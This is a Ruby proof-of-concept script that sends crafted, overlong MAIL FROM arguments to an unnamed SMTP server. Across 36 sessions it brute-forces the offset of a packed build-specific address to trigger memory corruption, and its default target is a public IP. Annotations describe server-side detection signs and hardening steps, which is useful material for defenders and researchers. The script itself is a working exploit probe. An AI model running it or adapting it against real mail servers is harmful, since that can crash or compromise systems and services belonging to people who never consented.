require 'socket'

# Proof-of-concept probe for a memory-corruption bug in how an SMTP server
# handles the MAIL FROM argument. The page names neither the affected product
# nor its version, and 0x4090bc is an address tied to one specific build
# (NOTE(review): presumably a 32-bit binary without address randomisation;
# confirm against the original advisory).
#
# Behaviour: for each offset from -40 to 100 in steps of 4 (36 sessions) the
# script opens a new connection, sends a short MAIL FROM / RCPT TO pair, then a
# second MAIL FROM whose 140-byte argument holds one packed 32-bit value at the
# offset under test, and finally waits up to one second for the reply to a
# further RCPT TO.
#
# What this looks like from the server side (useful for detection/triage):
#   * a burst of short sessions from one source, none of which send HELO/EHLO;
#   * two MAIL FROM commands inside one session, the second with an argument
#     that has no <...> path syntax and contains bytes outside printable ASCII;
#   * sessions that end without a reply; "Timeout" here means the daemon did
#     not answer, which on the server would presumably show up as a worker
#     crash or hang, so correlate with crash logs and core dumps.
# Hardening that addresses the pattern: bound the copy of the command argument
# to the destination buffer, reject MAIL/RCPT arguments that are not valid
# paths, and refuse mail commands before HELO/EHLO.

# The default host is a publicly routable address (193.168.50.89 is not inside
# 192.168.0.0/16), so the lab target should always be passed explicitly as the
# first argument.
targeth = ARGV[0] || '193.168.50.89'
targetp = ARGV[1] || 25   # stays a String when taken from ARGV; TCPSocket accepts both

# Build-specific address taken from the page; its meaning is not documented there.
addrzero = 0x4090bc

(-40).step(100, 4) do |mallocoffset|
  puts("trying #{mallocoffset}")

  TCPSocket.open(targeth, targetp) do |sock|
    sock.gets                                # server banner

    # First, well-formed-length envelope; replies are read and discarded.
    sock.write("MAIL FROM:bruuuuute\r\n")
    sock.gets
    sock.write("RCPT TO:fooooorce\r\n")
    sock.gets

    # 140 filler bytes with four of them replaced by the packed value.
    # 'L' packs a native-endian unsigned 32-bit integer, so the bytes on the
    # wire depend on the machine running the script.
    mailfrom = "X" * 140
    mailfrom[40 + mallocoffset, 4] = [addrzero - 40].pack('L')
    sock.write("MAIL FROM:" + mailfrom + "\r\n")
    sock.gets

    puts("sending rcpt")
    sock.write("RCPT TO:foobar\r\n")

    # One-second liveness check: a readable socket means the server replied
    # (or closed the connection, in which case gets returns nil).
    answered = IO.select([sock], nil, nil, 1)
    if answered
      puts("Got answer !")
      puts(sock.gets)
    else
      puts("Timeout")
    end
  end
end